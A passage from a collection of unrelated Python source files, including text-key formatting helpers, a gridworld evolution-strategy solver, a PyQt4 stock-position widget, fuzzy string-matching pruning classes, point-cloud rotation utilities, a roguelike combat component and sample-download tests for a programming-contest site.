    # `parse_type in f.__name__` over a list of functions, which silently
    # depended on each type string occurring in exactly one function name and
    # would break on a rename.
    formatters = {
        "modified_camel": keys_to_modified_camel,
        "camel_case": keys_to_camel_case,
        "snake_case": keys_to_snake_case,
    }
    if parse_type not in formatters:
        raise ValueError(
            "Invalid parse type, use modified_camel, camel_case or snake_case"
        )
    if not isinstance(data, dict):
        raise TypeError("Invalid data type, use dict.")
    return formatters[parse_type](data)
def pretty_attributes(
    all_attributes: dict, desired_attributes: Iterable[str], max_attributes: int = 3
) -> str:
    """Return a pretty string for the __repr__ body of an object.

    Walks ``desired_attributes`` in order, skipping missing/None entries, and
    renders up to ``max_attributes`` of them as comma-separated ``name=value``
    pairs; ints are rendered bare, everything else single-quoted.
    """
    parts = []
    shown = 0
    for name in desired_attributes:
        if shown >= max_attributes:
            break
        value = all_attributes.get(name, None)
        if value is None:
            continue
        shown += 1
        if isinstance(value, int):
            parts.append(f"{name}={value}")
        else:
            parts.append(f"{name}='{value}'")
    # join() avoids the original's append-then-strip trailing ", " dance.
    return ", ".join(parts)
def get_attributes(fields_to_iterate: list, attributes_to_fetch: list = None) -> list:
    """Collect (snake_case_key, value) pairs from a list of field dicts.

    Only labels listed in ``attributes_to_fetch`` (case-insensitive) are
    collected; with no fetch list nothing is collected, matching the original
    filter condition.  Single-element list values are unwrapped.
    """
    if attributes_to_fetch:
        attributes_to_fetch = [a.lower() for a in attributes_to_fetch]
    collected = []
    for field in fields_to_iterate:
        label = field["fieldName"].lower()
        try:
            value = field["fieldValue"]["value"]
        except TypeError:
            # fieldValue is not subscriptable (e.g. None) -- treat as missing.
            value = None
        if not attributes_to_fetch or label not in attributes_to_fetch:
            continue
        if isinstance(value, list) and len(value) == 1:
            value = value[0]
        collected.append((to_snake_case(label), value))
    return collected
def set_default_attr(obj: object, attr_name_to_set: str, value, default_value=None):
    """Set an attribute on ``obj`` only if it does not already exist.

    NOTE(review): any falsy ``value`` (0, "", [], False) falls back to
    ``default_value`` because of the ``or`` -- confirm that is intended.
    """
    if hasattr(obj, attr_name_to_set):
        return
    setattr(obj, attr_name_to_set, value or default_value)
|
#!/usr/bin/env python3
def __init__(hub):
    # Plugin entry point for the pop/hub framework: the framework calls this
    # with the shared `hub` object, which is stashed in a module-level global
    # so the exception classes below can attach it to each instance.
    global HUB
    HUB = hub
class InvalidStructureError(OSError):
    """OSError variant that records the shared hub and a message."""

    def __init__(self, msg):
        # Pass msg to the base exception so str()/args carry the message
        # (the original stored it only on self.msg).
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
class CorruptedMetarepoError(KeyError):
    """KeyError variant that records the shared hub and a message."""

    def __init__(self, msg):
        # Pass msg to the base exception so str()/args carry the message.
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
class CorruptedKitError(ValueError):
    """ValueError variant that records the shared hub and a message."""

    def __init__(self, msg):
        # Pass msg to the base exception so str()/args carry the message.
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
class GitServiceError(ValueError):
    """Base error for git-service problems; records the shared hub and a message."""

    def __init__(self, msg):
        # Pass msg to the base exception so str()/args carry the message.
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
class GitHubRepoURIError(GitServiceError):
    """GitServiceError for GitHub repository URI problems."""

    def __init__(self, msg):
        # Pass msg up the chain so str()/args carry the message.
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
class FuntooStashRepoURIError(GitServiceError):
    """GitServiceError for Funtoo Stash repository URI problems."""

    def __init__(self, msg):
        # Pass msg up the chain so str()/args carry the message.
        super().__init__(msg)
        self.hub = HUB
        self.msg = msg
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2021 The TARTRL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import copy
import numpy as np
from gridworld.envs.gridworld.multiGoalSolver import SelectSolver
from gridworld.algorithms.ranking_cost.ES_model import ESModel
from gridworld.algorithms.ranking_cost.ES_engine import EvolutionStrategy
# Patience threshold used by ESSolver.stop_function: training stops once
# (iteration - best_reward_step) reaches this many ES iterations.
best_step = 50
class ESSolver(SelectSolver):
    """Evolution-strategy solver that learns a ranking of start/goal pairs plus
    per-pair maze cost weights, then plans each pair in ranked order."""

    # Not referenced inside this class; kept for interface parity.
    AGENT_HISTORY_LENGTH = 1
    # Scale applied to the normalized negative cost used as the ES reward.
    REWARD_SCALE = 20
    # Std-dev of ES parameter perturbations.
    SIGMA = 0.1
    LEARNING_RATE = 0.01

    def __init__(self, train_num, POPULATION_SIZE=20, print_step=1, action_type='VonNeumann_4', block_width=0,
                 train_rank=True, model_save_path=None, logger=None, saver=None):
        """Configure the solver and build the ES engine with our callbacks.

        :param train_num: number of ES iterations per solve
        :param POPULATION_SIZE: ES population size
        :param print_step: logging cadence (stored; consumed by the engine/logger)
        :param action_type: movement model passed to SelectSolver
        :param block_width: obstacle inflation width passed to SelectSolver
        :param train_rank: if True, learn the pair ordering; otherwise keep input order
        :param model_save_path: where to save the model (defaults to ./model.pkl)
        :param logger: optional progress logger
        :param saver: optional weight saver
        """
        super().__init__(action_type, block_width)
        self.train_num = train_num
        self.POPULATION_SIZE = POPULATION_SIZE
        self.print_step = print_step
        self.train_rank = train_rank
        self.model_save_path = model_save_path if model_save_path else './model.pkl'
        self.logger = logger
        self.saver = saver
        # The ES engine drives training by calling back into this object.
        self.es = EvolutionStrategy(self.get_reward, self.log_function, self.stop_function,
                                    self.saver,
                                    self.POPULATION_SIZE, self.SIGMA,
                                    self.LEARNING_RATE)

    def _solve(self, maze_data, starts, goals):
        """Reset per-problem state and run the ES training loop."""
        assert len(starts) == len(goals)
        sg_pairs = list(zip(starts, goals))
        start_num = len(sg_pairs)
        self.mini_cost = 1e6
        # Worst-case cost bound: every cell of the maze.
        self.max_cost = np.prod(maze_data.shape)
        self.best_solution = None
        self.best_traces = None
        self.best_reward = -1e6
        self.best_reward_step = 0
        self.model = ESModel(pair_num=start_num, maze_shape=maze_data.shape)
        self.es.reset()
        self.es.set_weights(self.model.get_weights())
        self.maze_data = maze_data
        self.sg_pairs = sg_pairs
        self.es.run(iterations=self.train_num)
        if self.saver:
            print('save final model!')
            self.saver.save(self.es.get_weights())

    def close(self):
        """Shut down the ES engine."""
        self.es.close()

    def log_function(self, iteration, weights, reward, rewards, time_duration):
        """Progress callback invoked by the ES engine each logged iteration."""
        if self.logger:
            self.logger.update_data({'reward': reward,
                                     'rewards': rewards,
                                     'time': time_duration,
                                     'step': iteration})
            self.logger.display_info()
            self.logger.plot_figure()
            self.logger.save_solution(self)

    def stop_function(self, iteration, weights, reward, rewards, time_duration):
        """Early-stopping callback for the ES loop.

        NOTE(review): the update condition looks inverted -- best_reward is
        replaced only when the *current* best is greater than the incoming
        reward, so starting from -1e6 it rarely updates and the loop tends to
        stop exactly ``best_step`` iterations in.  Confirm intended behavior
        against the ES engine before changing.
        """
        if self.best_reward > reward:
            self.best_reward = reward
            self.best_reward_step = iteration
            return False
        if self.best_reward <= reward and (iteration - self.best_reward_step) >= best_step:
            return True
        return False

    def get_reward(self, weights):
        """Reward callback: negative normalized plan cost, scaled."""
        cost_now, traces_now, solution_rank = self.get_solution(weights)
        # Failed or degenerate plans are clamped to the worst-case cost.
        if cost_now is None or cost_now >= self.max_cost:
            cost_now = self.max_cost
        cost_now = cost_now / self.max_cost
        reward_now = -cost_now
        return reward_now * self.REWARD_SCALE

    def get_solution(self, weights):
        """Evaluate one weight vector: rank the pairs and plan them in order."""
        self.model.set_weights(weights)
        solution_rank, maze_weights = self.get_maze_weights()
        cost_now, traces_now = self.planOnSolution(solution_rank, maze_weights, self.maze_data, self.sg_pairs)
        # Cache the most recent evaluation for external inspection/saving.
        self.cost_now = cost_now
        self.traces_now = traces_now
        self.solution_now = solution_rank
        return cost_now, traces_now, solution_rank

    def get_maze_weights(self):
        """Return the pair ordering and the per-pair cost maps in that order."""
        prediction = self.model.get_rank_prob()
        if self.train_rank:
            # Descending rank probability defines the planning order.
            solution_rank = np.argsort(prediction)[::-1]
        else:
            # Fixed input order when rank learning is disabled.
            solution_rank = range(len(prediction))
        maze_now = copy.copy(self.model.get_maze_data())
        maze_now = maze_now[solution_rank]
        return solution_rank, maze_now

    def planOnSolution(self, rank_now, maze_weights, maze_data, sg_pairs):
        """Plan every start/goal pair in ranked order, accumulating the cost.

        Later (not-yet-planned) pairs' endpoints are treated as blocked cells,
        and their cost maps are summed into ``extra_cost`` for the planner.
        Returns (None, None) if any single pair cannot be planned.
        """
        rank_now = list(rank_now)
        cost_all = 0
        new_maze_data = copy.copy(maze_data)
        new_sg_pairs = []
        for i in rank_now:
            new_sg_pairs.append(sg_pairs[i])
        traces = []
        for i, sg_pair in enumerate(new_sg_pairs):
            block_poses = []
            if i < len(new_sg_pairs) - 1:
                # Endpoints of pairs planned after this one are obstacles.
                for b in new_sg_pairs[i + 1:]:
                    for bb in b:
                        block_poses.append(bb)
                        if self.block_width > 0:
                            # Also block each endpoint's neighbours.
                            for key in self.transitions:
                                bb_neighbour = [bb[0] + self.transitions[key][0], bb[1] + self.transitions[key][1]]
                                block_poses.append(bb_neighbour)
            if i == len(new_sg_pairs) - 1:
                extra_cost = None
            else:
                extra_cost = np.sum(maze_weights[i + 1:], axis=0)
            cost, trace_now = self.planOnOneStart(new_maze_data, sg_pair, block_poses, extra_cost=extra_cost)
            if cost is None:
                return None, None
            traces.append(trace_now)
            cost_all += cost
        return cost_all, traces

    def load(self, filename='weights.pkl'):
        """Load pickled model weights and sync them into the ES engine."""
        with open(filename, 'rb') as fp:
            self.model.set_weights(pickle.load(fp))
        self.es.weights = self.model.get_weights()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'StockPosition.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
    # PyQt4 with QString enabled (API v1): use Qt's own UTF-8 conversion.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # API v2 / Python 3 builds have no QString; strings are already unicode.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt4 drops the encoding argument from translate().
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_DockWidget(object):
    """Generated UI for the spot-position dock widget (from StockPosition.ui).

    Do not hand-edit behavior here: the file header warns changes are lost on
    regeneration.  Layout: one horizontal row of two checkboxes, a radio
    button with a line edit, and search/export buttons.
    """

    def setupUi(self, DockWidget):
        """Build the widget tree and layouts, then wire translations/slots."""
        DockWidget.setObjectName(_fromUtf8("DockWidget"))
        DockWidget.resize(860, 65)
        self.dockWidgetContents = QtGui.QWidget()
        self.dockWidgetContents.setObjectName(_fromUtf8("dockWidgetContents"))
        self.verticalLayout = QtGui.QVBoxLayout(self.dockWidgetContents)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        # Checkbox: hide zero positions.
        self.cb_no_zero_position = QtGui.QCheckBox(self.dockWidgetContents)
        self.cb_no_zero_position.setObjectName(_fromUtf8("cb_no_zero_position"))
        self.horizontalLayout.addWidget(self.cb_no_zero_position)
        # Checkbox: show only ETFs and funds.
        self.cb_only_etf_fund = QtGui.QCheckBox(self.dockWidgetContents)
        self.cb_only_etf_fund.setObjectName(_fromUtf8("cb_only_etf_fund"))
        self.horizontalLayout.addWidget(self.cb_only_etf_fund)
        # Radio button enabling the security-code filter, checked by default.
        self.rb_code = QtGui.QRadioButton(self.dockWidgetContents)
        self.rb_code.setChecked(True)
        self.rb_code.setObjectName(_fromUtf8("rb_code"))
        self.horizontalLayout.addWidget(self.rb_code)
        # Line edit for the security code to filter on.
        self.le_code_data = QtGui.QLineEdit(self.dockWidgetContents)
        self.le_code_data.setObjectName(_fromUtf8("le_code_data"))
        self.horizontalLayout.addWidget(self.le_code_data)
        spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        # Query and export action buttons.
        self.pb_search = QtGui.QPushButton(self.dockWidgetContents)
        self.pb_search.setObjectName(_fromUtf8("pb_search"))
        self.horizontalLayout.addWidget(self.pb_search)
        self.pb_export = QtGui.QPushButton(self.dockWidgetContents)
        self.pb_export.setObjectName(_fromUtf8("pb_export"))
        self.horizontalLayout.addWidget(self.pb_export)
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.verticalLayout.addLayout(self.horizontalLayout)
        DockWidget.setWidget(self.dockWidgetContents)
        self.retranslateUi(DockWidget)
        QtCore.QMetaObject.connectSlotsByName(DockWidget)

    def retranslateUi(self, DockWidget):
        """Apply (Chinese) display strings to all widgets."""
        DockWidget.setWindowTitle(_translate("DockWidget", "现货持仓", None))
        self.cb_no_zero_position.setText(_translate("DockWidget", "不显示0持仓", None))
        self.cb_only_etf_fund.setText(_translate("DockWidget", "只显示ETF和基金", None))
        self.rb_code.setText(_translate("DockWidget", "证券代码筛选", None))
        self.pb_search.setText(_translate("DockWidget", "查询", None))
        self.pb_export.setText(_translate("DockWidget", "导出", None))
|
from ipywidgets import DOMWidget
from traitlets import Unicode, Int, Bool
from ._version import EXTENSION_SPEC_VERSION
# Front-end extension package name shared by all widget model/view declarations.
module_name = "jupyter-plot-utils"
class SimpleShape(DOMWidget):
    """Jupyter widget backed by the SimpleShapeModel/SimpleShapeView pair in
    the jupyter-plot-utils front-end extension."""

    # Model/view wiring required by ipywidgets to find the JS counterpart.
    _model_name = Unicode('SimpleShapeModel').tag(sync=True)
    _model_module = Unicode(module_name).tag(sync=True)
    _model_module_version = Unicode(EXTENSION_SPEC_VERSION).tag(sync=True)
    _view_name = Unicode('SimpleShapeView').tag(sync=True)
    _view_module = Unicode(module_name).tag(sync=True)
    _view_module_version = Unicode(EXTENSION_SPEC_VERSION).tag(sync=True)
    # Synced flag consumed by the JS view; rendering semantics are defined in
    # the front-end code (presumably toggles a rotation -- confirm there).
    rotate = Bool(False).tag(sync=True)
|
"""
Pruning module.
Classes:
- NoPruning
- LazyCountPruning
- BucketCountPruning
- BatchCountPruning
"""
import math
import logging
logger = logging.getLogger(__name__)
class NoPruning:
    """Pruning strategy that prunes nothing: every span is yielded."""

    @classmethod
    def filter(cls,
               Pe: list,
               Le: int,
               Te: int,
               *args
               ) -> None:
        """Yield every (i, j) span with 1 <= i < j <= len(Pe).

        Parameters
        ----------
        Pe : list
            Sorted position list.
        Le : int
            Lower bound of |s| = |G(s)| (number of s's q-grams); unused here.
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams); unused here.
        args :
            Ignored extra arguments.

        Yields
        ------
        Count spans: start (i) and end (j) indexes (1-based) into Pe.
        """
        size = len(Pe)
        for start in range(1, size + 1):
            for end in range(start + 1, size + 1):
                yield start, end
class LazyCountPruning:
    """Lazy-Count Pruning: drop the entity entirely when |Pe| < Tl (Lemma 3)."""

    @classmethod
    def filter(cls,
               Pe: list,
               Le: int,
               Te: int,
               Tl: int,
               *args
               ) -> None:
        """Yield spans via NoPruning unless the occurrence count is below Tl.

        Parameters
        ----------
        Pe : list
            Sorted position list.
        Le : int
            Lower bound of |s| = |G(s)| (number of s's q-grams).
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound).
        args :
            Ignored extra arguments.

        Yields
        ------
        Start and end index pairs of surviving spans.
        """
        if len(Pe) < Tl:
            # Too few occurrences to ever reach the bound: prune everything.
            return
        yield from NoPruning.filter(Pe, Le, Te)
class BucketCountPruning:
    """Bucket-Count Pruning class.

    Performs Bucket-Count Pruning:
        - 1. Perform Lazy-Count Pruning (|Pe| >= Tl gate).
        - 2. Partition the position list into buckets of nearby positions and
          keep only buckets large enough to reach the lazy-count bound.
    """

    @classmethod
    def filter(cls,
               Pe: list,
               Le: int,
               Te: int,
               Tl: int,
               tighter_bound_func,
               *bound_args
               ) -> None:
        """Searches count spans using Bucket Count Pruning.

        TODO: No partitioning? --> size(bucket) < Tl, then prune elements in bucket
        TODO: Check condition? --> (j - i + 1 >= Tl)

        Parameters
        ----------
        Pe : list
            Sorted position list.
        Le : int
            Lower bound of |s| = |G(s)| (number of s's q-grams).
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound)
        tighter_bound_func :
            Tighter bound function for edit distance and edit similarity.
        bound_args :
            Tighter bound function arguments.

        Yields
        ------
        Start (i) and end (j) indexes of sublists of Pe.
        """
        # lazy-count pruning: |Pe| < Tl <= T (Lemma 3)
        # TODO: why condition for 'No Pruning' ?
        if len(Pe) >= Tl:
            try:
                Te_diff_Tl = tighter_bound_func(*bound_args)
            # tighter bound is not supported for jaccard, cosine and dice -- uses Te - Tl
            except Exception:
                Te_diff_Tl = Te - Tl
            # partitioning
            for i, j in cls.iter_bucket_spans(Pe, Te_diff_Tl):
                # Check length of bucket
                # TODO: Reuse existing class: yield from LazyCountPruning.filter(Pe[i:j], Le, Te, Tl)
                if j - i + 1 >= Tl:
                    yield i, j

    @classmethod
    def iter_bucket_spans(cls,
                          Pe: list,
                          t: int
                          ):
        """Iterate over position list (Pe), yielding bucket spans.

        1. Loop over position list (Pe)
            a. Get neighbour positions pi, pj
            b. Close the current bucket when the gap between neighbours
               exceeds the threshold.
            c. Move to next neighbours
        If p_(i+1) - p_i - 1 > t, create new partition.
        Threshold t may vary for different similarity functions.
        TODO: Check condition? --> (pj - pi + 1 > t) --> (pj - pi - 1 > t)

        Parameters
        ----------
        Pe : list
            Sorted position list.
        t : int
            Threshold for partitioning.

        Yields
        ------
        Start and end position of current bucket window.
        """
        # neighbour indexes (1-based into Pe)
        i, j = 1, 2
        # bucket indexes (Pe[k;l])
        k = i
        l = i
        while True:
            try:
                # get elements
                pi, pj = Pe[i-1], Pe[j-1]
            # check for end of position list
            except IndexError:
                # last position
                l = i
                # return bucket indexes
                yield k, l
                # end
                break
            else:
                # TODO: Check paper for correct formulae
                # condition for new bucket
                if pj - pi + 1 > t:
                    # last position
                    l = i
                    yield k, l
                    # create new bucket
                    k = j
                # move span by 1
                i += 1
                j += 1
class BatchCountPruning:
    """Batch-Count Pruning class.

    Performs Batch-Count pruning: only windows Pe[i...j] satisfying both the
    occurrence-count bounds (Tl <= |Pe[i...j]| <= Te) and the substring-length
    bounds (Le <= |D[pi...pj]| <= Te) are yielded for counting; window starts
    are advanced via binary-search helpers rather than one step at a time.
    """

    @classmethod
    def filter(cls,
               Pe: list,
               Le: int,
               Te: int,
               Tl: int,
               tighter_bound_func,
               *bound_args
               ) -> None:
        """Searches candidate windows using Batch-Count Pruning.

        Parameters
        ----------
        Pe : list
            Sorted position list.
        Le : int
            Lower bound of |s| = |G(s)| (number of s's q-grams).
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound).
        tighter_bound_func :
            Tighter bound function for edit distance and edit similarity.
        bound_args :
            Tighter bound function arguments.

        Yields
        ------
        Start and end position of the candidate window.
        """
        # lazy-count pruning: |Pe| <= Tl < T (Lemma 3)
        if len(Pe) >= Tl:
            # find possible candidate windows using ``binary_span`` and ``binary_shift``
            for i, j in cls.iter_possible_candidate_windows(Pe, Te, Tl):
                try:
                    # |e|, |Pe[i. . .j]|, t
                    tighter_Te = tighter_bound_func(bound_args[0], j-i+1, bound_args[1])
                except Exception as e:
                    logger.info(e)
                    # tighter bound is not supported for edit distance and similarity -- uses Te
                    tighter_Te = Te
                # check if possible candidate window is an actual candidate window
                if cls.check_possible_candidate_window(i, j, Pe, Le, Te, Tl, tighter_Te):
                    # return the span for counting
                    yield i, j

    @classmethod
    def check_possible_candidate_window(cls,
                                        i: int,
                                        j: int,
                                        Pe: list,
                                        Le: int,
                                        Te: int,
                                        Tl: int,
                                        tighter_Te: int = None
                                        ) -> bool:
        """Checks whether a window is a ``possible candidate window''.

        Parameters
        ----------
        i : int
            Window start position.
        j : int
            Window end position.
        Pe : list
            Sorted position list.
        Le : int
            Lower bound of |s| = |G(s)| (number of s's q-grams).
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound).
        tighter_Te : int
            Even tighter upper bound Te.

        Returns
        -------
        True, if window is ``possible candidate window''.
        """
        # (j-1)+1 = j (-1 due to 0-based indexing and +1 because python list is non-inclusive)
        Pe_ij = Pe[i-1:j]
        # this is redundant to check because it is made sure by ``find_possible_candidate_spans``
        # valid window: make sure that we have a valid window (cf. Definition 3, condition 1)
        if Tl <= len(Pe_ij) <= Te:
            pi = Pe[i-1]
            pj = Pe[j-1]
            if tighter_Te is None:
                tighter_Te = Te
            # candidate window: make sure we have a candidate window (cf. Definition 3, condition 2)
            if Le <= pj - pi + 1 <= tighter_Te:
                return True
        return False

    @classmethod
    def iter_possible_candidate_windows(cls,
                                        Pe: list,
                                        Te: int,
                                        Tl: int
                                        ):
        """Slide a window start over Pe and yield possible candidate windows.

        For each valid start i, the minimal window Pe[i..i+Tl-1] is tested;
        if its substring span fits within Te, ``binary_span`` extends the end
        as far as the bound allows; otherwise ``binary_shift`` jumps the start
        forward past hopeless positions.

        Parameters
        ----------
        Pe : list
            Sorted position list.
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound).

        Yields
        ------
        (i, mid) pairs: start index and the extended end index of a possible
        candidate window.
        """
        i = 1
        while i <= len(Pe) - Tl + 1:
            # pg. 535 left column, last line (initially Pe[1,..,Tl])
            j = i + Tl - 1
            # 0 based indexing; add -1
            pj, pi = Pe[j-1], Pe[i-1]
            # length for substring |D[pi...pj]| = pj-pi+1 is not larger than upper bound
            if (pj - pi + 1) <= Te:
                # we have a valid substring with size, Tl ≤ |Pe[i · · · j]| ≤ Te
                # Hence, find candidate window ⊥e ≤ |D[pi · · · pj]| ≤ Te
                mid = cls.binary_span(i, j, Pe, Te)
                yield i, mid
                i += 1
            else:
                # candidate windows are too long
                i = cls.binary_shift(i, j, Pe, Te, Tl)

    @classmethod
    def binary_shift(cls,
                     i: int,
                     j: int,
                     Pe: list,
                     Te: int,
                     Tl: int
                     ):
        """Performs binary shift on position list Pe.

        Binary-searches the smallest start shift for which the minimal window
        could still satisfy the Te bound, recursing if the shifted window is
        still too long.

        Parameters
        ----------
        i : int
            Window start position.
        j : int
            Window end position.
        Pe : list
            Sorted position list.
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).
        Tl : int
            Lower bound of shared tokens between e and s (lazy-count bound).

        Returns
        -------
        Lower bound of shifted window.
        """
        lower = i
        upper = j
        while lower <= upper:
            mid = math.ceil((lower + upper) / 2)
            pmid, pj = Pe[mid-1], Pe[j-1]
            if ((pj + (mid - i)) - pmid + 1) > Te:
                lower = mid + 1
            else:
                upper = mid - 1
        i = lower
        j = i + Tl - 1
        # if j jumps over, clip it to the length of position list
        if j > len(Pe):
            j = len(Pe)
        pi, pj = Pe[i-1], Pe[j-1]
        if (pj - pi + 1) > Te:
            # TODO: Recursion Error
            i = cls.binary_shift(i, j, Pe, Te, Tl)
        return i

    @classmethod
    def binary_span(cls,
                    i: int,
                    j: int,
                    Pe: list,
                    Te: int
                    ) -> int:
        """Performs binary span on position list Pe.

        Parameters
        ----------
        i : int
            Window start position.
        j : int
            Window end position.
        Pe : list
            Sorted position list.
        Te : int
            Upper bound of |s| = |G(s)| (number of s's q-grams).

        Returns
        -------
        Returns the new right span, which is the medium of lower and upper.
        """
        lower = j
        upper = i + Te - 1
        while lower <= upper:
            # mid is new right span, eventually larger than j (i.e. lower)
            # if mid jumps out of len(Pe) then it will raise IndexError!
            mid = int(math.ceil((upper + lower)/2))
            if mid <= len(Pe):
                pmid, pi = Pe[mid-1], Pe[i-1]
                if pmid - pi + 1 > Te:
                    upper = mid - 1
                else:
                    lower = mid + 1
            # this is heuristic based, if mid exceeds the length, we decrement it;
            # without this condition we miss many candidate windows e.g. 'surauijt ch'
            # in Table 1 document for entity 'surajit ch'
            else:
                upper = mid - 1
        mid = upper
        return mid
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from scipy.spatial.transform import Rotation
# Part of the code is referred from: https://github.com/ClementPinard/SfmLearner-Pytorch/blob/master/inverse_warp.py
def quat2mat(quat):
    """Convert a batch of quaternions in (x, y, z, w) layout to rotation matrices.

    :param quat: (B, 4) tensor of quaternions.
    :return: (B, 3, 3) tensor of rotation matrices.
    """
    B = quat.size(0)
    x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
    w2, x2, y2, z2 = w * w, x * x, y * y, z * z
    wx, wy, wz = w * x, w * y, w * z
    xy, xz, yz = x * y, x * z, y * z
    # Assemble the nine matrix entries row-major, then fold into (B, 3, 3).
    row0 = [w2 + x2 - y2 - z2, 2 * xy - 2 * wz, 2 * wy + 2 * xz]
    row1 = [2 * wz + 2 * xy, w2 - x2 + y2 - z2, 2 * yz - 2 * wx]
    row2 = [2 * xz - 2 * wy, 2 * wx + 2 * yz, w2 - x2 - y2 + z2]
    return torch.stack(row0 + row1 + row2, dim=1).reshape(B, 3, 3)
def transform_point_cloud(point_cloud, rotation, translation):
    """Apply a rigid transform to a batch of point clouds.

    :param point_cloud: (B, 3, N) points.
    :param rotation: (B, 4) quaternions or (B, 3, 3) rotation matrices.
    :param translation: (B, 3) translation vectors.
    :return: transformed (B, 3, N) points.
    """
    # A 2-D rotation argument is a batch of quaternions; anything else is
    # treated as a batch of rotation matrices.
    rot_mat = quat2mat(rotation) if rotation.dim() == 2 else rotation
    return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
    """Convert a sequence of 3x3 rotation matrices to Euler angles in degrees.

    :param mats: sequence of 3x3 rotation matrices.
    :param seq: Euler axis sequence understood by scipy (default 'zyx').
    :return: float32 array of shape (len(mats), 3).
    """
    # scipy renamed Rotation.from_dcm to from_matrix in 1.4 and removed the
    # old name in 1.6; prefer the new API and fall back for old scipy.
    from_matrix = getattr(Rotation, 'from_matrix', None) or Rotation.from_dcm
    eulers = []
    for i in range(len(mats)):
        r = from_matrix(mats[i])
        eulers.append(r.as_euler(seq, degrees=True))
    return np.asarray(eulers, dtype='float32')
def error_euler_angles(mat_pred, eulers_gt, seq='zyx'):
    """Euler-angle error between predicted rotation matrices and ground truth.

    :param mat_pred: (N, 3, 3) predicted rotation matrices.
    :param eulers_gt: (N, 3) ground-truth Euler angles in degrees.
    :param seq: Euler axis sequence understood by scipy.
    :return: per-sample Euler angles (degrees) of R_pred @ R_gt^T.
    """
    mat_diff = []
    for i in range(mat_pred.shape[0]):
        r_pred = mat_pred[i]
        r_gt = Rotation.from_euler(seq, eulers_gt[i], degrees=True)
        # scipy renamed as_dcm to as_matrix in 1.4 and removed it in 1.6;
        # prefer the new API and fall back for old scipy.
        as_matrix = getattr(r_gt, 'as_matrix', None) or r_gt.as_dcm
        mat_diff.append(r_pred.dot(as_matrix().T))
    return npmat2euler(mat_diff)
from __future__ import annotations
import game.entity
from game.components.base_component import BaseComponent
class Fighter(BaseComponent):
    """Combat-stats component: hit points plus base defense/power, with any
    equipment bonuses folded in via the derived properties."""

    def __init__(self, hp: int, base_defense: int, base_power: int):
        super().__init__()
        self.max_hp = hp
        self.hp = hp
        self.base_defense = base_defense
        self.base_power = base_power

    @property
    def defense(self) -> int:
        """Base defense plus equipment bonus."""
        return self.base_defense + self.defense_bonus

    @property
    def power(self) -> int:
        """Base power plus equipment bonus."""
        return self.base_power + self.power_bonus

    @property
    def defense_bonus(self) -> int:
        """Defense bonus from the owning actor's equipment, if any."""
        actor = self.get_parent(game.entity.Actor)
        return actor.equipment.defense_bonus if actor.equipment else 0

    @property
    def power_bonus(self) -> int:
        """Power bonus from the owning actor's equipment, if any."""
        actor = self.get_parent(game.entity.Actor)
        return actor.equipment.power_bonus if actor.equipment else 0
|
import unittest
import tests.command_download
class DownloadTophTest(unittest.TestCase):
    """Sample-download tests for Toph (toph.co) problems.

    Each test downloads a problem's sample files and verifies their MD5
    digests against the recorded fixtures.
    """

    def snippet_call_download(self, *args, **kwargs):
        # Delegate to the shared helper, passing this TestCase for assertions.
        tests.command_download.snippet_call_download(self, *args, **kwargs)

    def test_call_download_toph_new_year_couple(self):
        self.snippet_call_download('https://toph.co/p/new-year-couple', {
            'sample-2.out': 'a147d4af6796629a62fa43341f0e0bdf',
            'sample-2.in': 'fc1dbb7bb49bfbb37e7afe9a64d2f89b',
            'sample-1.in': 'd823c94a5bbd1af3161ad8eb4e48654e',
            'sample-1.out': '0f051fce168dc5aa9e45605992cd63c5',
        })

    def test_call_download_toph_power_and_mod(self):
        self.snippet_call_download('https://toph.co/p/power-and-mod', {
            'sample-1.in': '46e186317c8c10d9452d6070f6c63b09',
